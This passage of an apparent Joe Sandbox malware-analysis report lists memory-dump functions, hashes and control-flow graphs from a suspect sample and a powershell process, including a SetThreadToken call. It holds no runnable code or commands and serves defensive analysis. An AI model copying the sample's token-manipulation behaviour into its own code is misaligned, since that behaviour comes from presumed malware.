                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97cad8097c71c32d91d32821e13344971c7ec821e93af43c97399264cbc9ae0c
                                                          • Instruction ID: e270323606c7d9ec482406fd4f0f9de43b8223ddbb77478e9a3a2e746aae8b3b
                                                          • Opcode Fuzzy Hash: 97cad8097c71c32d91d32821e13344971c7ec821e93af43c97399264cbc9ae0c
                                                          • Instruction Fuzzy Hash: 82212575D0025A9FCB06DFA8D4549DDBFB1FF49310B40829AD594AB3A2DB30A906CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02980C39 Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a953f741ca8e2906083047ccf841e41706bdd23ecac336a8ea9859ca21287ac
                                                          • Instruction ID: 86097fa42ba2b0ad90c9a2824bef0b14c6cf55d9a57ae1467d32ccc6470fe434
                                                          • Opcode Fuzzy Hash: 7a953f741ca8e2906083047ccf841e41706bdd23ecac336a8ea9859ca21287ac
                                                          • Instruction Fuzzy Hash: CE21E279E012089FDB08DFA9D494ADEBBB2BF89310F14956AE401B7350DB319944CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02981128 Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b21cd015d1ae5b647e8a6088d0bbeda4f65ea66151381fd53aa7cd13e36831d3
                                                          • Instruction ID: 7b8725d7458c34424e5ff1c13d1703ca672f874d38db690b823d9beb1bc7386b
                                                          • Opcode Fuzzy Hash: b21cd015d1ae5b647e8a6088d0bbeda4f65ea66151381fd53aa7cd13e36831d3
                                                          • Instruction Fuzzy Hash: 9821F075E0021A9FCB06DFA8D4549DDBBB5EF49310F4082AAD554BB3A1DB30AA06CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 028AD6D7 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                          • Instruction ID: 22917f675dc2df6849f7a38ff0bbcbb3245afb7d80350a1a3705c0d14cd7875f
                                                          • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                          • Instruction Fuzzy Hash: 7811E67A504244CFDB05DF10D5C4B1ABF72FB84324F24C6A9DC498B656C336D456CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 028AD5EB Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                          • Instruction ID: bd577030d3d1c57e7318da6bfb6c604f7bfd3b45c9e089aea207142d00f65da4
                                                          • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                          • Instruction Fuzzy Hash: 0111E17A504280CFDB05CF04D9C0B16BF72FB84324F24C5A9D8498B667C336D456CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 028AD031 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a16dbef445f95a6e870f2bfde832a314f053dbb6e7ad607db703b3d98feed607
                                                          • Instruction ID: 6646bbfedb15b2e73e7fccdef3701a600371f944adec937bda756446e4fb7efc
                                                          • Opcode Fuzzy Hash: a16dbef445f95a6e870f2bfde832a314f053dbb6e7ad607db703b3d98feed607
                                                          • Instruction Fuzzy Hash: 5A01F7394043049BF7204A21CC95766BFD8DF80229F04C419EC09CE682CB799846CAB2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02981940 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c8af2d1b41af9f71e460f0f4854483eac5b23fa1ff3eb5c0b0eb598a680c624
                                                          • Instruction ID: 39110b1e70bd24fb41097261cb1d25053ed67db2f7cc425ffe6f492e825f60bf
                                                          • Opcode Fuzzy Hash: 5c8af2d1b41af9f71e460f0f4854483eac5b23fa1ff3eb5c0b0eb598a680c624
                                                          • Instruction Fuzzy Hash: 7211D078E00218CFDB24DF68C994B9CBBB1BF48300F108599D409AB365DB30AE86CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 028AD030 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2222834913.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28ad000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 477b665e144c008b1f2297e6a3321d89b55d0765c5a221784646781281621905
                                                          • Instruction ID: 5afcc700430b87215b2eb2fe11e535f995fe35e4498bd02c01d8ec72b92389bd
                                                          • Opcode Fuzzy Hash: 477b665e144c008b1f2297e6a3321d89b55d0765c5a221784646781281621905
                                                          • Instruction Fuzzy Hash: 27F0CD35004344AEE7208A16C884B62FFD8EB80734F18C55AED0C8E282C779A845CBB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02981FA7 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b38961eae0e474cd0796854eb1f302e969638427ec938d051e52210ac9db7b1
                                                          • Instruction ID: 6fbad946f197daf4a0837c38a3348bab78c314efbe6c7b6a43d46db1207a5651
                                                          • Opcode Fuzzy Hash: 1b38961eae0e474cd0796854eb1f302e969638427ec938d051e52210ac9db7b1
                                                          • Instruction Fuzzy Hash: ACF0B4387041446FD714DE59D440EAEBBAAEFC9220718C0ABF849CB702DB709843CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02981A13 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2223474730.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2980000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de92ab37866f3d989f2199eadb9acfbe150c9b47764d9845b2424d1793fa73a1
                                                          • Instruction ID: 2bea578d9c61f67df61cc194d18e9cf9b518ddafc299c10bda7a73dc1b7a8d8f
                                                          • Opcode Fuzzy Hash: de92ab37866f3d989f2199eadb9acfbe150c9b47764d9845b2424d1793fa73a1
                                                          • Instruction Fuzzy Hash: 40D0C935F50108ABCF14CFCAE8408DCBB31EFC5235F005255D566BB294C73099168F88
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:5.8%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:3
                                                          Total number of Limit Nodes:0
                                                          execution_graph 24498 8a46650 24499 8a46658 SetThreadToken 24498->24499 24501 8a466c1 24499->24501

                                                          Executed Functions

                                                          Function 0498B490 Relevance: .3, Instructions: 258COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1064 498b490-498b4b9 1065 498b4bb 1064->1065 1066 498b4be-498b7f9 call 498aab4 1064->1066 1065->1066 1127 498b7fe-498b805 1066->1127
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d3556adf065c060d19cd960882d1ab874fb4fade467561f9a8c60b64a349b42
                                                          • Instruction ID: 7c1dbd7dfdff8bc4c5330151d35df7a8f74b3c8c4a25d0a450a995b3a99201a6
                                                          • Opcode Fuzzy Hash: 0d3556adf065c060d19cd960882d1ab874fb4fade467561f9a8c60b64a349b42
                                                          • Instruction Fuzzy Hash: 27913074F007185BEB19EFB985106AEBBE3EF84700B00892DE556AB344DF74AE058BD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498B4A0 Relevance: .3, Instructions: 252COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1212 498b4a0-498b4b9 1213 498b4bb 1212->1213 1214 498b4be-498b7f9 call 498aab4 1212->1214 1213->1214 1275 498b7fe-498b805 1214->1275
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8c301b2aab11894e1b9082654a004576cf91ea531ddb93b0bc65c186af20a8d
                                                          • Instruction ID: 972a1a7669cd6e836ce55dac24e3875bb9ecf02bfa3462028d550452c77a5829
                                                          • Opcode Fuzzy Hash: a8c301b2aab11894e1b9082654a004576cf91ea531ddb93b0bc65c186af20a8d
                                                          • Instruction Fuzzy Hash: 90912074F007189BEB19EFB9851066EBBE3EF84700B40892DE516AB344DF74AE058BD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07852308 Relevance: 22.9, Strings: 17, Instructions: 1634COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1332767140.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$tPq$tPq$tPq$tPq$$q$$q$$q
                                                          • API String ID: 0-2170552499
                                                          • Opcode ID: bc40d1a04159a7513e98d0cab53582ded8a99ba0012d68a3646ffae6ee6e4158
                                                          • Instruction ID: a9597e5e3967e35e0323fdec9f9e20b37476cda4170c7bc7a41b75487ac4cc78
                                                          • Opcode Fuzzy Hash: bc40d1a04159a7513e98d0cab53582ded8a99ba0012d68a3646ffae6ee6e4158
                                                          • Instruction Fuzzy Hash: D0C259F1B0430A9FDB258F6998047AABBE1BF95325F14807ADD05CB292DF31D845C7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07853CE8 Relevance: 5.6, Strings: 4, Instructions: 591COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 483 7853ce8-7853d0d 484 7853f00-7853f4a 483->484 485 7853d13-7853d18 483->485 493 7853f50-7853f55 484->493 494 78540ce-7854112 484->494 486 7853d30-7853d34 485->486 487 7853d1a-7853d20 485->487 491 7853eb0-7853eba 486->491 492 7853d3a-7853d3c 486->492 489 7853d24-7853d2e 487->489 490 7853d22 487->490 489->486 490->486 495 7853ebc-7853ec5 491->495 496 7853ec8-7853ece 491->496 497 7853d4c 492->497 498 7853d3e-7853d4a 492->498 500 7853f57-7853f5d 493->500 501 7853f6d-7853f71 493->501 512 7854228-785425d 494->512 513 7854118-785411d 494->513 502 7853ed4-7853ee0 496->502 503 7853ed0-7853ed2 496->503 499 7853d4e-7853d50 497->499 498->499 499->491 505 7853d56-7853d75 499->505 506 7853f61-7853f6b 500->506 507 7853f5f 500->507 510 7853f77-7853f79 501->510 511 7854080-785408a 501->511 509 7853ee2-7853efd 502->509 503->509 546 7853d85 505->546 547 7853d77-7853d83 505->547 506->501 507->501 515 7853f89 510->515 516 7853f7b-7853f87 510->516 517 7854097-785409d 511->517 518 785408c-7854094 511->518 536 785425f-7854281 512->536 537 785428b-7854295 512->537 521 7854135-7854139 513->521 522 785411f-7854125 513->522 523 7853f8b-7853f8d 515->523 516->523 524 78540a3-78540af 517->524 525 785409f-78540a1 517->525 528 785413f-7854141 521->528 529 78541da-78541e4 521->529 530 7854127 522->530 531 7854129-7854133 522->531 523->511 532 7853f93-7853fb2 523->532 533 78540b1-78540cb 524->533 525->533 538 7854151 528->538 539 7854143-785414f 528->539 540 78541e6-78541ee 529->540 541 78541f1-78541f7 529->541 530->521 531->521 566 7853fb4-7853fc0 532->566 567 7853fc2 532->567 581 78542d5-78542fe 536->581 582 7854283-7854288 536->582 550 7854297-785429c 537->550 551 785429f-78542a5 537->551 544 7854153-7854155 538->544 539->544 548 78541fd-7854209 541->548 549 78541f9-78541fb 541->549 544->529 553 785415b-785415d 544->553 554 7853d87-7853d89 546->554 547->554 555 785420b-7854225 548->555 549->555 557 78542a7-78542a9 551->557 558 78542ab-78542b7 551->558 560 7854177-785417e 553->560 561 785415f-7854165 553->561 554->491 563 7853d8f-7853d96 554->563 565 78542b9-78542d2 557->565 558->565 572 7854196-78541d7 560->572 573 7854180-7854186 560->573 568 7854167 561->568 569 7854169-7854175 561->569 563->484 570 7853d9c-7853da1 563->570 578 7853fc4-7853fc6 566->578 567->578 568->560 569->560 579 7853da3-7853da9 570->579 580 7853db9-7853dc8 570->580 583 7854188 573->583 584 785418a-7854194 573->584 578->511 585 7853fcc-7854003 578->585 587 7853dad-7853db7 579->587 588 7853dab 579->588 580->491 595 7853dce-7853dec 580->595 599 7854300-7854326 581->599 600 785432d-785435c 581->600 583->572 584->572 609 7854005-785400b 585->609 610 785401d-7854024 585->610 587->580 588->580 595->491 608 7853df2-7853e17 595->608 599->600 606 7854395-785439f 600->606 607 785435e-785437b 600->607 613 78543a1-78543a5 606->613 614 78543a8-78543ae 606->614 626 78543e5-78543ea 607->626 627 785437d-785438f 607->627 608->491 634 7853e1d-7853e24 608->634 616 785400d 609->616 617 785400f-785401b 609->617 611 7854026-785402c 610->611 612 785403c-785407d 610->612 619 7854030-785403a 611->619 620 785402e 611->620 623 78543b4-78543c0 614->623 624 78543b0-78543b2 614->624 616->610 617->610 619->612 620->612 628 78543c2-78543e2 623->628 624->628 626->627 627->606 635 7853e26-7853e41 634->635 636 7853e6a-7853e9d 634->636 640 7853e43-7853e49 635->640 641 7853e5b-7853e5f 635->641 646 7853ea4-7853ead 636->646 643 7853e4d-7853e59 640->643 644 7853e4b 640->644 645 7853e66-7853e68 641->645 643->641 644->641 645->646
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1332767140.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'q$4'q$4'q$4'q
                                                          • API String ID: 0-4210068417
                                                          • Opcode ID: eba60d4918a7157454d5edc745f2de42316d5ba390f24f0180a77746baf852c3
                                                          • Instruction ID: 090fbeab4da40a5b6e9fb12526ebb9ac28b4f653031e14413ff326f6bbd419bf
                                                          • Opcode Fuzzy Hash: eba60d4918a7157454d5edc745f2de42316d5ba390f24f0180a77746baf852c3
                                                          • Instruction Fuzzy Hash: 7D129FB1B043569FDB258F6894107BABBA29FD5255F14807BCD09CF641DB32DC81C7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 08A46648 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 652 8a46648-8a4664e 653 8a46650-8a46656 652->653 654 8a46658-8a4668b 652->654 653->654 655 8a46693-8a466bf SetThreadToken 654->655 656 8a466c1-8a466c7 655->656 657 8a466c8-8a466e5 655->657 656->657
                                                          APIs
                                                          • SetThreadToken.KERNELBASE(?), ref: 08A466B2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1336212223.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_8a40000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ThreadToken
                                                          • String ID:
                                                          • API String ID: 3254676861-0
                                                          • Opcode ID: 300de38d187a76fd82502e6a351d4c25c447d199e84ebd449f61e619da82ec13
                                                          • Instruction ID: b8a5925ca4ddf2d85eb6b6c946b99fdd1018b5ef1bb28d0943110b49c31276dc
                                                          • Opcode Fuzzy Hash: 300de38d187a76fd82502e6a351d4c25c447d199e84ebd449f61e619da82ec13
                                                          • Instruction Fuzzy Hash: 201167B1D003488FEB20DF9AC445B9EFFF4EB89224F14881AD119A7250C674A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 08A46650 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 660 8a46650-8a466bf SetThreadToken 663 8a466c1-8a466c7 660->663 664 8a466c8-8a466e5 660->664 663->664
                                                          APIs
                                                          • SetThreadToken.KERNELBASE(?), ref: 08A466B2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1336212223.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_8a40000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ThreadToken
                                                          • String ID:
                                                          • API String ID: 3254676861-0
                                                          • Opcode ID: 885a6132a4924837a3bc5b0fcc2ceda49a8d71ceed97b14f57390d2ccbb5e09f
                                                          • Instruction ID: 59c47756ba57eb0d541a0fd3b85e15dbfef085fefc73d4b66674bafe28f1711a
                                                          • Opcode Fuzzy Hash: 885a6132a4924837a3bc5b0fcc2ceda49a8d71ceed97b14f57390d2ccbb5e09f
                                                          • Instruction Fuzzy Hash: 8A1136B5D003088FDB20DF9AC845B9EFBF8EB89324F14841AD519A7350C774A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04986FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 667 4986fe0-4986fff 670 4987105-4987143 667->670 671 4987005-4987008 667->671 698 498700a call 498767c 671->698 699 498700a call 4987697 671->699 673 4987010-4987022 674 498702e-4987043 673->674 675 4987024 673->675 681 4987049-4987059 674->681 682 49870ce-49870e7 674->682 675->674 684 498705b 681->684 685 4987065-4987073 call 498bf20 681->685 687 49870e9 682->687 688 49870f2-49870f3 682->688 684->685 691 4987079-498707d 685->691 687->688 688->670 692 49870bd-49870c8 691->692 693 498707f-498708f 691->693 692->681 692->682 694 49870ab-49870b5 693->694 695 4987091-49870a9 693->695 694->692 695->692 698->673 699->673
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (q
                                                          • API String ID: 0-2414175341
                                                          • Opcode ID: ab4c40ce076efc97a30c768daf6dbcd912922ec5d6f0d44bc11b110cab7a03bd
                                                          • Instruction ID: a3e26850ab4394f7bc5eada913b181f292943dc97ade69df79973b833e7e8802
                                                          • Opcode Fuzzy Hash: ab4c40ce076efc97a30c768daf6dbcd912922ec5d6f0d44bc11b110cab7a03bd
                                                          • Instruction Fuzzy Hash: F5412C34B042048FDB14DFA8C854AADBBF6EB8D615F2454A8E406EB391DB35EC01CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498AFA8 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 701 498afa8-498afaf 702 498afb6-498afba 701->702 703 498afb1 call 498a79c 701->703 704 498afca-498b065 702->704 705 498afbc-498afc9 702->705 703->702 712 498b06e-498b08b 704->712 713 498b067-498b06d 704->713 713->712
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (&q
                                                          • API String ID: 0-583763264
                                                          • Opcode ID: 7160912858f13e2060afcbd3781e4cfaf7553f3142c92b6ccb986acf2d905ce6
                                                          • Instruction ID: 8347431f41258ca5be8a9a74c0cf51e53f07d6cfa70ab1ec7738086419e407ba
                                                          • Opcode Fuzzy Hash: 7160912858f13e2060afcbd3781e4cfaf7553f3142c92b6ccb986acf2d905ce6
                                                          • Instruction Fuzzy Hash: 3721E275E043088FCB25EFAED400B9EBBF5EB89320F14846ED418E7340CA74A9458BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498E7B8 Relevance: .3, Instructions: 254COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1128 498e7b8-498e7d8 1129 498e7da-498e7dc 1128->1129 1130 498e7e1-498e7ee 1128->1130 1131 498eb41-498eb48 1129->1131 1133 498e7f0-498e801 1130->1133 1135 498e803-498e825 call 498014c 1133->1135 1140 498e988-498e99f 1135->1140 1141 498e82b 1135->1141 1149 498ea7b-498ea87 1140->1149 1150 498e9a5 1140->1150 1142 498e82d-498e83e 1141->1142 1145 498e840-498e842 1142->1145 1147 498e85c-498e8e5 1145->1147 1148 498e844-498e84a 1145->1148 1177 498e8ec-498e921 1147->1177 1178 498e8e7 1147->1178 1151 498e84c 1148->1151 1152 498e84e-498e85a 1148->1152 1156 498eb39 1149->1156 1157 498ea8d-498eaa4 1149->1157 1153 498e9a7-498e9b8 1150->1153 1151->1147 1152->1147 1160 498e9ba-498e9bc 1153->1160 1156->1131 1157->1156 1170 498eaaa 1157->1170 1162 498e9be-498e9c4 1160->1162 1163 498e9d6-498ea0e 1160->1163 1165 498e9c8-498e9d4 1162->1165 1166 498e9c6 1162->1166 1181 498ea10 1163->1181 1182 498ea15-498ea4a 1163->1182 1165->1163 1166->1163 1173 498eaac-498eabd 1170->1173 1180 498eabf-498eac1 1173->1180 1194 498e92b 1177->1194 1195 498e923 1177->1195 1178->1177 1183 498eadb-498eb09 1180->1183 1184 498eac3-498eac9 1180->1184 1181->1182 1198 498ea4c 1182->1198 1199 498ea54 1182->1199 1202 498eb0b-498eb16 1183->1202 1203 498eb35-498eb37 1183->1203 1187 498eacb 1184->1187 1188 498eacd-498ead9 1184->1188 1187->1183 1188->1183 1194->1140 1195->1194 1198->1199 1199->1149 1208 498eb19 call 498e7b8 1202->1208 1209 498eb19 call 498e7a8 1202->1209 1210 498eb19 call 498e92e 1202->1210 1211 498eb19 call 498ea57 1202->1211 1203->1131 1205 498eb1f-498eb33 1205->1202 1205->1203 1208->1205 1209->1205 1210->1205 1211->1205
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4eeec31b6812458981656eee455d86f22a6a9a98a8f287c068dee4f30f1e7052
                                                          • Instruction ID: e38c755b47d2dfa72af22142b73e039fbecd76c20d5bf276212009e0bc9a0691
                                                          • Opcode Fuzzy Hash: 4eeec31b6812458981656eee455d86f22a6a9a98a8f287c068dee4f30f1e7052
                                                          • Instruction Fuzzy Hash: E0914B34F002189FDB24EF69D450A6DBBE6AF88610B15457DE806EB355DF71EC02CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049829F0 Relevance: .2, Instructions: 209COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1276 49829f0-4982a1e 1277 4982a24-4982a3a 1276->1277 1278 4982af5-4982b37 1276->1278 1279 4982a3c 1277->1279 1280 4982a3f-4982a52 1277->1280 1282 4982b3d-4982b56 1278->1282 1283 4982c51-4982c61 1278->1283 1279->1280 1280->1278 1287 4982a58-4982a65 1280->1287 1285 4982b58 1282->1285 1286 4982b5b-4982b69 1282->1286 1285->1286 1286->1283 1293 4982b6f-4982b79 1286->1293 1289 4982a6a-4982a7c 1287->1289 1290 4982a67 1287->1290 1289->1278 1294 4982a7e-4982a88 1289->1294 1290->1289 1295 4982b7b-4982b7d 1293->1295 1296 4982b87-4982b94 1293->1296 1297 4982a8a-4982a8c 1294->1297 1298 4982a96-4982aa6 1294->1298 1295->1296 1296->1283 1299 4982b9a-4982baa 1296->1299 1297->1298 1298->1278 1300 4982aa8-4982ab2 1298->1300 1301 4982bac 1299->1301 1302 4982baf-4982bbd 1299->1302 1303 4982ac0-4982af4 1300->1303 1304 4982ab4-4982ab6 1300->1304 1301->1302 1302->1283 1306 4982bc3-4982bd3 1302->1306 1304->1303 1308 4982bd8-4982be5 1306->1308 1309 4982bd5 1306->1309 1308->1283 1312 4982be7-4982bf7 1308->1312 1309->1308 1313 4982bf9 1312->1313 1314 4982bfc-4982c08 1312->1314 1313->1314 1314->1283 1317 4982c0a-4982c24 1314->1317 1318 4982c29 1317->1318 1319 4982c26 1317->1319 1320 4982c2e-4982c38 1318->1320 1319->1318 1321 4982c3d-4982c50 1320->1321
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81b81bb2a828d9e1744bd55da0753fa2514dbbc54bfa6a04b84dfe4aa5463a6e
                                                          • Instruction ID: d0c59557935219145b2caa13b79eb238e4934c24c230b472c84733b84e980e25
                                                          • Opcode Fuzzy Hash: 81b81bb2a828d9e1744bd55da0753fa2514dbbc54bfa6a04b84dfe4aa5463a6e
                                                          • Instruction Fuzzy Hash: AD915E74A006059FCB15DF5CC494AAEFBB1FF89310B2485A9E815AB3A5C735FC51CBA0
